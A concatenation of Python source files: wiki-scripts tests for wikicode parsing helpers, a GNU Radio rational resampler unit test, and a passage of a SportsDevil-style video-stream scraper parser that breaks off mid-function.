def test_linestart_twolinks(self):
snippet = """\
Another paragraph.
[[link1]][[link2]] some other text.
"""
expected = """\
Another paragraph.
[[link2]] some other text.
"""
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link1]]", expected)
def test_multiple_nodes(self):
snippet = "[[link1]][[link2]][[link3]]"
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link1]]", "[[link2]][[link3]]")
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link2]]", "[[link1]][[link3]]")
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link3]]", "[[link1]][[link2]]")
def test_multiple_nodes_text(self):
snippet = "foo [[link1]][[link2]][[link3]] bar"
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link1]]", "foo [[link2]][[link3]] bar")
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link2]]", "foo [[link1]][[link3]] bar")
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link3]]", "foo [[link1]][[link2]] bar")
def test_multiple_nodes_spaces(self):
snippet = "foo [[link1]] [[link2]] [[link3]] bar"
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link1]]", "foo [[link2]] [[link3]] bar")
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link2]]", "foo [[link1]] [[link3]] bar")
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link3]]", "foo [[link1]] [[link2]] bar")
def test_multiple_nodes_newlines(self):
snippet = "[[link1]]\n[[link2]]\n[[link3]]"
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link1]]", "[[link2]]\n[[link3]]")
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link2]]", "[[link1]]\n[[link3]]")
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link3]]", "[[link1]]\n[[link2]]")
def test_multiple_newlines(self):
snippet = """\
First paragraph
[[link]]
"""
expected = """\
First paragraph
"""
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link]]", expected)
class test_get_section_headings:
@staticmethod
def _do_test(text, expected):
result = get_section_headings(text)
assert result == expected
def test_balanced(self):
snippet = """
foo
== Section 1 ==
bar
=== Section 2===
=Section 3 =
== Section 4 ===
"""
expected = ["Section 1", "Section 2", "Section 3", "Section 4 ="]
self._do_test(snippet, expected)
def test_unbalanced(self):
snippet = """
Invalid section 1 ==
== Invalid section 2
== Valid section 1 =
= Valid section 2 ==
== Valid section 3 = =
= = Valid section 4 ==
"""
expected = [
"= Valid section 1",
"Valid section 2 =",
"= Valid section 3 =",
"= Valid section 4 =",
]
self._do_test(snippet, expected)
def test_levels(self):
snippet = """
= Level 1 =
== Level 2 ==
=== Level 3 ===
==== Level 4 ====
===== Level 5 =====
====== Level 6 ======
======= Invalid level =======
"""
expected = [
"Level 1",
"Level 2",
"Level 3",
"Level 4",
"Level 5",
"Level 6",
"= Invalid level =",
]
self._do_test(snippet, expected)
class test_get_anchors:
def test_simple(self):
snippet = """
== foo ==
== bar ==
== foo ==
== foo_2 ==
== foo 2 ==
"""
expected = ["foo", "bar", "foo_2", "foo_2_2", "foo_2_3"]
result = get_anchors(get_section_headings(snippet))
assert result == expected
def test_complex(self):
snippet = """
== foo_2 ==
== foo_2_2 ==
== foo ==
== foo ==
== foo 2 ==
== foo 2 ==
"""
expected = ["foo_2", "foo_2_2", "foo", "foo_3", "foo_2_3", "foo_2_4"]
result = get_anchors(get_section_headings(snippet))
assert result == expected
def test_casing(self):
snippet = """
=== foo bar ===
=== Foo Bar ===
=== Foo bar ===
=== foo Bar ===
"""
expected = ["foo_bar", "Foo_Bar_2", "Foo_bar_3", "foo_Bar_4"]
result = get_anchors(get_section_headings(snippet))
assert result == expected
def test_strip(self):
snippet = """
== Section with ''wikicode'' ==
== Section with <i>tag</i> ==
== Section with HTML entities Σ, Σ, and Σ ==
== Section with [[Main page|wikilink]] ==
== Section with <nowiki><nowiki></nowiki> ==
== #section starting with hash ==
"""
expected = [
"Section_with_wikicode",
"Section_with_tag",
"Section_with_HTML_entities_.CE.A3.2C_.CE.A3.2C_and_.CE.A3",
"Section_with_wikilink",
"Section_with_.3Cnowiki.3E",
".23section_starting_with_hash",
]
result = get_anchors(get_section_headings(snippet))
assert result == expected
def test_strip_pretty(self):
snippet = """
== Section with ''wikicode'' ==
== Section with <i>tag</i> ==
== Section with HTML entities Σ, Σ, and Σ ==
== Section with [[Main page|wikilink]] ==
== Section with <nowiki><nowiki></nowiki> ==
== #section starting with hash ==
"""
expected = [
"Section with wikicode",
"Section with tag",
"Section with HTML entities Σ, Σ, and Σ",
"Section with wikilink",
"Section with <nowiki>", # FIXME: should be encoded, i.e. "Section with %3Cnowiki%3E",
"#section starting with hash",
]
result = get_anchors(get_section_headings(snippet), pretty=True)
assert result == expected
def test_encoding(self):
snippet = """
== Section with | pipe ==
== Section with [brackets] ==
== Section with <invalid tag> ==
"""
expected = [
"Section with %7C pipe",
"Section with %5Bbrackets%5D",
"Section with <invalid tag>",
]
result = get_anchors(get_section_headings(snippet), pretty=True)
assert result == expected
def test_invalid(self):
snippet = """
== Section with trailing spaces ==
== Invalid 1 == foo
==
Invalid 2 ==
== Invalid 3
==
==
Invalid 4
==
== Invalid 5
foo ==
"""
expected = [
"Section with trailing spaces",
]
result = get_anchors(get_section_headings(snippet), pretty=True)
assert result == expected
class test_ensure_flagged:
def test_add(self):
wikicode = mwparserfromhell.parse("[[foo]]")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]]{{bar}}"
def test_preserve(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]] {{bar}}"
def test_strip_params(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar|baz}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]] {{bar}}"
def test_replace_params(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar|baz}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar", "param1", "param2")
assert str(wikicode) == "[[foo]] {{bar|param1|param2}}"
def test_named_params(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar|baz}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar", "2=param1", "1=param2")
assert str(wikicode) == "[[foo]] {{bar|2=param1|1=param2}}"
def test_dead_link(self):
wikicode = mwparserfromhell.parse("[[foo]]{{Dead link|2000|01|01}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "Dead link", "2017", "2", "3", overwrite_parameters=False)
assert str(wikicode) == "[[foo]]{{Dead link|2000|01|01}}"
class test_ensure_unflagged:
def test_noop(self):
wikicode = mwparserfromhell.parse("[[foo]]")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]]"
def test_preserve(self):
wikicode = mwparserfromhell.parse("[[foo]] {{baz}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]] {{baz}}"
def test_remove(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]]"
def test_no_remove(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar (Language)}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]] {{bar (Language)}}"
def test_match_only_prefix(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar (Language)}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar", match_only_prefix=True)
assert str(wikicode) == "[[foo]]"
def test_match_only_prefix_no_remove(self):
wikicode = mwparserfromhell.parse("[[foo]] {{baz (Language)}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar", match_only_prefix=True)
assert str(wikicode) == "[[foo]] {{baz (Language)}}"
class test_is_flagged:
def test_noop(self):
wikicode = mwparserfromhell.parse("[[foo]]")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar") is False
def test_false(self):
wikicode = mwparserfromhell.parse("[[foo]] {{baz}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar") is False
def test_true(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar") is True
def test_false_exact_match(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar (Language)}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar") is False
def test_match_only_prefix(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar (Language)}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar", match_only_prefix=True) is True
def test_match_only_prefix_false(self):
wikicode = mwparserfromhell.parse("[[foo]] {{baz (Language)}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar", match_only_prefix=True) is False
class test_is_redirect:
redirects = [
# any number of spaces
"#redirect[[foo]]",
"#redirect [[foo]]",
"#redirect [[foo]]",
# optional colon
"#redirect: [[foo]]",
"#redirect :[[foo]]",
"#redirect : [[foo]]",
# any capitalization
"#reDiRect [[foo]]",
"#REDIRECT [[foo]]",
# leading whitespace
"\n \n #redirect [[foo]]",
# any section and alternative text (which is ignored)
"#redirect [[foo#section]]",
"#redirect [[foo#section|ignored]]",
# templates
# FIXME: probably not possible to pair '{{' and '}}' with a regex
# "#redirect [[{{echo|Foo}}bar]]",
]
nonredirects = [
"#redirect [[]]",
"#redirect [[]]",
"#redirect [[<nowikifoo]]",
"#redirect :: [[foo]]",
"#redirect [[foo{}]]",
]
def test_redirects(self):
for text in self.redirects:
assert is_redirect(text, full_match=False)
assert is_redirect(text, full_match=True)
text += "\n"
assert is_redirect(text, full_match=False)
assert is_redirect(text, full_match=True)
text += "bar"
assert is_redirect(text, full_match=False)
assert not is_redirect(text, full_match=True)
def test_nonredirects(self):
for text in self.redirects:
assert not is_redirect("foo" + text, full_match=False)
assert not is_redirect("foo" + text, full_match=True)
for text in self.nonredirects:
assert not is_redirect("foo" + text, full_match=False)
assert not is_redirect("foo" + text, full_match=True)
class test_parented_ifilter:
wikicode = mwparserfromhell.parse("""<span>
foo {{bar|some text and {{another|template}}}}
</span>
{{foo|bar}}
""")
def test_recursive(self):
nodes = []
for parent, node in parented_ifilter(self.wikicode,
recursive=True):
nodes.append(node)
assert parent.index(node) >= 0
assert nodes == self.wikicode.filter(recursive=True)
def test_nonrecursive(self):
nodes = []
for parent, node in parented_ifilter(self.wikicode,
recursive=False):
nodes.append(node)
assert parent.index(node) >= 0
assert nodes == self.wikicode.filter(recursive=False)
def test_recursive_templates(self):
templates = []
for parent, template in parented_ifilter(self.wikicode,
forcetype=mwparserfromhell.nodes.template.Template,
recursive=True):
templates.append(template)
assert parent.index(template) >= 0
assert templates == self.wikicode.filter_templates(recursive=True)
def test_nonrecursive_templates(self):
templates = []
for parent, template in parented_ifilter(self.wikicode,
forcetype=mwparserfromhell.nodes.template.Template,
recursive=False):
templates.append(template)
assert parent.index(template) >= 0
assert templates == self.wikicode.filter_templates(recursive=False)
|
lahwaacz/wiki-scripts
|
tests/parser_helpers/test_wikicode.py
|
Python
|
gpl-3.0
| 18,144 | 0.001488 |
#!/usr/bin/env python
#
# Copyright 2005-2007,2010,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from __future__ import print_function
from __future__ import division
from gnuradio import gr, gr_unittest, filter, blocks
import math
import random
import sys
def random_floats(n):
r = []
for x in range(n):
# r.append(float(random.randint(-32768, 32768)))
r.append(float(random.random()))
return tuple(r)
def reference_dec_filter(src_data, decim, taps):
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.fir_filter_fff(decim, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op, dst)
tb.run()
result_data = dst.data()
tb = None
return result_data
def reference_interp_filter(src_data, interp, taps):
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.interp_fir_filter_fff(interp, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op, dst)
tb.run()
result_data = dst.data()
tb = None
return result_data
def reference_interp_dec_filter(src_data, interp, decim, taps):
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
up = filter.interp_fir_filter_fff(interp, (1,))
dn = filter.fir_filter_fff(decim, taps)
dst = blocks.vector_sink_f()
tb.connect(src, up, dn, dst)
tb.run()
result_data = dst.data()
tb = None
return result_data
class test_rational_resampler (gr_unittest.TestCase):
def setUp(self):
random.seed(0)
def tearDown(self):
pass
def test_000_1_to_1(self):
taps = (-4, 5)
src_data = (234, -4, 23, -56, 45, 98, -23, -7)
xr = (1186, -112, 339, -460, -167, 582)
expected_result = tuple([float(x) for x in xr])
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(1, 1, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
self.assertEqual(expected_result, result_data)
def test_001_interp(self):
taps = [1, 10, 100, 1000, 10000]
src_data = (0, 2, 3, 5, 7, 11, 13, 17)
interpolation = 3
xr = (2,20,200,2003,20030,
300,3005,30050,
500,5007,50070,
700,7011,70110,
1100,11013,110130,
1300,13017,130170,
1700.0,17000.0,170000.0, 0.0)
expected_result = tuple([float(x) for x in xr])
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(interpolation, 1, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
self.assertEqual(expected_result, result_data)
def test_002_interp(self):
taps = random_floats(31)
src_data = random_floats(10000)
interpolation = 3
expected_result = reference_interp_filter(src_data, interpolation, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(interpolation, 1, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
N = 1000
offset = len(taps)-1
self.assertEqual(expected_result[offset:offset+N], result_data[0:N])
def xtest_003_interp(self):
taps = random_floats(9)
src_data = random_floats(10000)
decimation = 3
expected_result = reference_dec_filter(src_data, decimation, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(1, decimation, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
N = 10
offset = 10#len(taps)-1
print(expected_result[100+offset:100+offset+N])
print(result_data[100:100+N])
#self.assertEqual(expected_result[offset:offset+N], result_data[0:N])
# FIXME disabled. Triggers hang on SuSE 10.0
def xtest_004_decim_random_vals(self):
MAX_TAPS = 9
MAX_DECIM = 7
OUTPUT_LEN = 9
random.seed(0) # we want reproducibility
for ntaps in range(1, MAX_TAPS + 1):
for decim in range(1, MAX_DECIM+1):
for ilen in range(ntaps + decim, ntaps + OUTPUT_LEN*decim):
src_data = random_floats(ilen)
taps = random_floats(ntaps)
expected_result = reference_dec_filter(src_data, decim, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(1, decim, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op, dst)
tb.run()
tb = None
result_data = dst.data()
L1 = len(result_data)
L2 = len(expected_result)
L = min(L1, L2)
if False:
sys.stderr.write('delta = %2d: ntaps = %d decim = %d ilen = %d\n' % (L2 - L1, ntaps, decim, ilen))
sys.stderr.write(' len(result_data) = %d len(expected_result) = %d\n' %
(len(result_data), len(expected_result)))
self.assertEqual(expected_result[0:L], result_data[0:L])
# FIXME disabled. Triggers hang on SuSE 10.0
def xtest_005_interp_random_vals(self):
MAX_TAPS = 9
MAX_INTERP = 7
INPUT_LEN = 9
random.seed(0) # we want reproducibility
for ntaps in range(1, MAX_TAPS + 1):
for interp in range(1, MAX_INTERP+1):
for ilen in range(ntaps, ntaps + INPUT_LEN):
src_data = random_floats(ilen)
taps = random_floats(ntaps)
expected_result = reference_interp_filter(src_data, interp, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(interp, 1, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op, dst)
tb.run()
tb = None
result_data = dst.data()
L1 = len(result_data)
L2 = len(expected_result)
L = min(L1, L2)
#if True or abs(L1-L2) > 1:
if False:
sys.stderr.write('delta = %2d: ntaps = %d interp = %d ilen = %d\n' % (L2 - L1, ntaps, interp, ilen))
#sys.stderr.write(' len(result_data) = %d len(expected_result) = %d\n' %
# (len(result_data), len(expected_result)))
#self.assertEqual(expected_result[0:L], result_data[0:L])
# FIXME check first ntaps+1 answers
self.assertEqual(expected_result[ntaps+1:L], result_data[ntaps+1:L])
def test_006_interp_decim(self):
taps = random_floats(31)
src_data = random_floats(10000)
interp = 3
decimation = 2
expected_result = reference_interp_dec_filter(src_data, interp, decimation, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(interp, decimation, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
N = 1000
offset = len(taps) // 2
self.assertFloatTuplesAlmostEqual(expected_result[offset:offset+N], result_data[0:N], 5)
if __name__ == '__main__':
# FIXME: Disabled, see ticket:210
gr_unittest.run(test_rational_resampler, "test_rational_resampler.xml")
|
iohannez/gnuradio
|
gr-filter/python/filter/qa_rational_resampler.py
|
Python
|
gpl-3.0
| 8,932 | 0.004478 |
# -*- coding: utf-8 -*-
import common
import sys, os, traceback
import time
import random
import re
import urllib
import string
from string import lower
from entities.CList import CList
from entities.CItemInfo import CItemInfo
from entities.CListItem import CListItem
from entities.CRuleItem import CRuleItem
import customReplacements as cr
import customConversions as cc
from utils import decryptionUtils as crypt
from utils import datetimeUtils as dt
from utils import rowbalance as rb
from utils.fileUtils import findInSubdirectory, getFileContent, getFileExtension
from utils.scrapingUtils import findVideoFrameLink, findContentRefreshLink, findRTMP, findJS, findPHP, getHostName, findEmbedPHPLink
from common import getHTML
class ParsingResult(object):
class Code:
SUCCESS = 0
CFGFILE_NOT_FOUND = 1
CFGSYNTAX_INVALID = 2
WEBREQUEST_FAILED = 3
def __init__(self, code, itemsList):
self.code = code
self.list = itemsList
self.message = None
class Parser(object):
"""
returns a list of items
"""
def parse(self, lItem):
url = lItem['url']
cfg = lItem['cfg']
ext = getFileExtension(url)
successfullyScraped = True
tmpList = None
if lItem['catcher']:
catcher = lItem['catcher']
cfg = os.path.join(common.Paths.catchersDir, '__' + catcher + '.cfg')
tmpList = self.__loadLocal(cfg, lItem)
if tmpList and len(tmpList.rules) > 0:
successfullyScraped = self.__loadRemote(tmpList, lItem)
else:
if ext == 'cfg':
tmpList = self.__loadLocal(url, lItem)
if tmpList and tmpList.start != '' and len(tmpList.rules) > 0:
lItem['url'] = tmpList.start
successfullyScraped = self.__loadRemote(tmpList, lItem)
elif cfg:
tmpList = self.__loadLocal(cfg, lItem)
if tmpList and len(tmpList.rules) > 0:
successfullyScraped = self.__loadRemote(tmpList, lItem)
# autoselect
if tmpList and tmpList.skill.find('autoselect') != -1 and len(tmpList.items) == 1:
m = tmpList.items[0]
m_type = m['type']
if m_type == 'rss':
common.log('Autoselect - ' + m['title'])
lItem = m
tmpList = self.parse(lItem).list
if not tmpList:
return ParsingResult(ParsingResult.Code.CFGSYNTAX_INVALID, None)
if tmpList and successfullyScraped == False:
return ParsingResult(ParsingResult.Code.WEBREQUEST_FAILED, tmpList)
# Remove duplicates
if tmpList.skill.find('allowDuplicates') == -1:
urls = []
for i in range(len(tmpList.items)-1,-1,-1):
item = tmpList.items[i]
tmpUrl = item['url']
tmpCfg = item['cfg']
if not tmpCfg:
tmpCfg = ''
if not urls.__contains__(tmpUrl + '|' + tmpCfg):
urls.append(tmpUrl + '|' + tmpCfg)
else:
tmpList.items.remove(item)
return ParsingResult(ParsingResult.Code.SUCCESS, tmpList)
"""
loads cfg, creates list and sets up rules for scraping
"""
def __loadLocal(self, filename, lItem = None):
params = []
#get Parameters
if filename.find('@') != -1:
params = filename.split('@')
filename = params.pop(0)
# get cfg file
cfg = filename
if not os.path.exists(cfg):
cfg = os.path.join(common.Paths.modulesDir, filename)
if not os.path.exists(cfg):
tmpPath = os.path.dirname(os.path.join(common.Paths.modulesDir, lItem["definedIn"]))
cfg = os.path.join(tmpPath ,filename)
if not os.path.exists(cfg):
srchFilename = filename
if filename.find('/') > -1:
srchFilename = srchFilename.split('/')[1]
try:
cfg = findInSubdirectory(srchFilename, common.Paths.modulesDir)
except:
try:
cfg = findInSubdirectory(srchFilename, common.Paths.favouritesFolder)
except:
try:
cfg = findInSubdirectory(srchFilename, common.Paths.customModulesDir)
except:
common.log('File not found: ' + srchFilename)
return None
#load file and apply parameters
data = getFileContent(cfg)
data = cr.CustomReplacements().replace(os.path.dirname(cfg), data, lItem, params)
#log
msg = 'Local file ' + filename + ' opened'
if len(params) > 0:
msg += ' with Parameter(s): '
msg += ",".join(params)
common.log(msg)
outputList = self.__parseCfg(filename, data, lItem)
return outputList
"""
scrape items according to rules and add them to the list
"""
def __loadRemote(self, inputList, lItem):
try:
inputList.curr_url = lItem['url']
count = 0
i = 1
maxits = 2 # 1 optimistic + 1 demystified
ignoreCache = False
demystify = False
back = ''
startUrl = inputList.curr_url
#print inputList, lItem
while count == 0 and i <= maxits:
if i > 1:
ignoreCache = True
demystify = True
# Trivial: url is from known streamer
if back:
lItem['referer'] = back
items = self.__parseHtml(inputList.curr_url, '"' + inputList.curr_url + '"', inputList.rules, inputList.skill, inputList.cfg, lItem)
count = len(items)
# try to find items in html source code
if count == 0:
referer = ''
if lItem['referer']:
referer = lItem['referer']
data = common.getHTML(inputList.curr_url, None, referer, False, False, ignoreCache, demystify)
if data == '':
return False
msg = 'Remote URL ' + inputList.curr_url + ' opened'
if demystify:
msg += ' (demystified)'
common.log(msg)
if inputList.section != '':
section = inputList.section
data = self.__getSection(data, section)
if lItem['section']:
section = lItem['section']
data = self.__getSection(data, section)
items = self.__parseHtml(inputList.curr_url, data, inputList.rules, inputList.skill, inputList.cfg, lItem)
count = len(items)
common.log(' -> ' + str(count) + ' item(s) found')
# find rtmp stream
#common.log('Find rtmp stream')
if count == 0:
item = self.__findRTMP(data, startUrl, lItem)
if item:
items = []
items.append(item)
count = 1
# find embedding javascripts
#common.log('Find embedding javascripts')
if count == 0:
item = findJS(data)
if item:
firstJS = item[0]
streamId = firstJS[0]
jsUrl = firstJS[1]
if not jsUrl.startswith('http://'):
jsUrl = urllib.basejoin(startUrl,jsUrl)
streamerName = getHostName(jsUrl)
jsSource = getHTML(jsUrl, None, startUrl, True, False)
phpUrl = findPHP(jsSource, streamId)
if phpUrl:
data = getHTML(phpUrl, None, startUrl, True, True)
item = self.__findRTMP(data, phpUrl, lItem)
if item:
if streamerName:
item['title'] = item['title'].replace('RTMP', streamerName)
items = []
items.append(item)
count = 1
else:
red = phpUrl
common.log(' -> Redirect: ' + red)
if back == red:
break
back = inputList.curr_url
inputList.curr_url = red
common.log(str(len(inputList.items)) + ' items ' + inputList.cfg + ' -> ' + red)
startUrl = red
continue
# find redirects
#common.log('find redirects')
if count == 0:
red = self.__findRedirect(startUrl, inputList.curr_url)
if startUrl == red:
common.log(' -> No redirect found')
else:
common.log(' -> Redirect: ' + red)
if back == red:
break
back = inputList.curr_url
inputList.curr_url = red
common.log(str(len(inputList.items)) + ' items ' + inputList.cfg + ' -> ' + red)
startUrl = red
i = 0
i += 1
if count != 0:
inputList.items = inputList.items + items
except:
traceback.print_exc(file = sys.stdout)
return False
return True
def __findRTMP(self, data, pageUrl, lItem):
rtmp = findRTMP(pageUrl, data)
if rtmp:
item = CListItem()
item['title'] = 'RTMP* - ' + rtmp[1]
item['type'] = 'video'
item['url'] = rtmp[0] + ' playPath=' + rtmp[1] + ' swfUrl=' + rtmp[2] +' swfVfy=1 live=true pageUrl=' + pageUrl
item.merge(lItem)
return item
return None
def __getSection(self, data, section):
p = re.compile(section, re.IGNORECASE + re.DOTALL + re.UNICODE)
m = p.search(data)
if m:
return m.group(0)
else:
common.log(' -> Section could not be found:' + section)
return data
def __findRedirect(self, page, referer='', demystify=False):
data = common.getHTML(page, None, referer = referer, xml = False, mobile=False, demystify = demystify)
if findVideoFrameLink(page, data):
return findVideoFrameLink(page, data)
elif findContentRefreshLink(data):
return findContentRefreshLink(data)
elif findEmbedPHPLink(data):
return findEmbedPHPLink(data)
if not demystify:
return self.__findRedirect(page, referer, True)
return page
def __parseCfg(self, cfgFile, data, lItem):
tmpList = CList()
data = data.replace('\r\n', '\n').split('\n')
items = []
tmp = None
hasOwnCfg = False
for m in data:
if m and m[0] != '#':
index = m.find('=')
if index != -1:
key = lower(m[:index]).strip()
value = m[index+1:]
index = value.find('|')
if value[:index] == 'sports.devil.locale':
value = common.translate(int(value[index+1:]))
elif value[:index] == 'sports.devil.image':
value = os.path.join(common.Paths.imgDir, value[index+1:])
if key == 'start':
tmpList.start = value
elif key == 'section':
tmpList.section = value
elif key == 'sort':
tmpList.sort = value
elif key == 'skill':
tmpList.skill = value
elif key == 'catcher':
tmpList.catcher = value
elif key == 'item_infos':
rule_tmp = CRuleItem()
hasOwnCfg = False
rule_tmp.infos = value
elif key == 'item_order':
rule_tmp.order = value
elif key == 'item_skill':
rule_tmp.skill = value
elif key == 'item_curr':
rule_tmp.curr = value
elif key == 'item_precheck':
rule_tmp.precheck = value
elif key.startswith('item_info'):
tmpkey = key[len('item_info'):]
if tmpkey == '_name':
info_tmp = CItemInfo()
info_tmp.name = value
if value == 'cfg':
hasOwnCfg = True
elif tmpkey == '_from':
info_tmp.src = value
elif tmpkey == '':
info_tmp.rule = value
elif tmpkey == '_default':
info_tmp.default = value
elif tmpkey == '_convert':
info_tmp.convert.append(value)
elif tmpkey == '_build':
info_tmp.build = value
rule_tmp.info_list.append(info_tmp)
elif key == 'item_url_build':
rule_tmp.url_build = value
if tmpList.catcher != '':
refInf = CItemInfo()
refInf.name = 'referer'
refInf.build = value
rule_tmp.info_list.append(refInf)
if not hasOwnCfg:
refInf = CItemInfo()
refInf.name = 'catcher'
refInf.build = tmpList.catcher
rule_tmp.info_list.append(refInf)
tmpList.rules.append(rule_tmp)
# static menu items (without regex)
elif key == 'title':
tmp = CListItem()
tmp['title'] = value
if tmpList.skill.find('videoTitle') > -1:
tmp['videoTitle'] = value
elif key == 'url':
tmp['url'] = value
if lItem:
tmp.merge(lItem)
if tmpList.catcher != '':
tmp['referer'] = value
if not hasOwnCfg:
tmp['catcher'] = tmpList.catcher
tmp['definedIn'] = cfgFile
items.append(tmp)
tmp = None
elif tmp != None:
if key == 'cfg':
hasOwnCfg = True
tmp[key] = value
tmpList.items = items
tmpList.cfg = cfgFile
return tmpList
def __parseHtml(self, url, data, rules, skills, definedIn, lItem):
#common.log('_parseHtml called' + url)
items = []
for item_rule in rules:
#common.log('rule: ' + item_rule.infos)
if not hasattr(item_rule, 'precheck') or (item_rule.precheck in data):
revid = re.compile(item_rule.infos, re.IGNORECASE + re.DOTALL + re.MULTILINE + re.UNICODE)
for reinfos in revid.findall(data):
tmp = CListItem()
if lItem['referer']:
tmp['referer'] = lItem['referer']
if item_rule.order.find('|') != -1:
infos_names = item_rule.order.split('|')
infos_values = list(reinfos)
i = 0
for name in infos_names:
tmp[name] = infos_values[i]
i = i+1
else:
tmp[item_rule.order] = reinfos
for info in item_rule.info_list:
info_value = tmp[info.name]
if info_value:
if info.build.find('%s') != -1:
tmpVal = info.build % info_value
tmp[info.name] = tmpVal
continue
if info.build.find('%s') != -1:
if info.src.__contains__('+'):
tmpArr = info.src.split('+')
src = ''
for t in tmpArr:
t = t.strip()
if t.find('\'') != -1:
src = src + t.strip('\'')
else:
src = src + tmp[t]
elif info.src.__contains__('||'):
variables = info.src.split('||')
src = firstNonEmpty(tmp, variables)
else:
src = tmp[info.src]
if src and info.convert != []:
tmp['referer'] = url
src = self.__parseCommands(tmp, src, info.convert)
if isinstance(src, dict):
for dKey in src:
tmp[dKey] = src[dKey]
src = src.values()[0]
info_value = info.build % (src)
else:
info_value = info.build
tmp[info.name] = info_value
if tmp['url']:
tmp['url'] = item_rule.url_build % (tmp['url'])
else:
tmp['url'] = url
tmp.merge(lItem)
if item_rule.skill.find('append') != -1:
tmp['url'] = url + tmp['url']
if item_rule.skill.find('space') != -1:
tmp['title'] = ' %s ' % tmp['title'].strip()
if skills.find('videoTitle') > -1:
tmp['videoTitle'] = tmp['title']
tmp['definedIn'] = definedIn
items.append(tmp)
return items
def __parseCommands(self, item, src, convCommands):
common.log('_parseCommands called')
# helping function
def parseCommand(txt):
command = {"command": txt, "params": ""}
if txt.find("(") > -1:
command["command"] = txt[0:txt.find("(")]
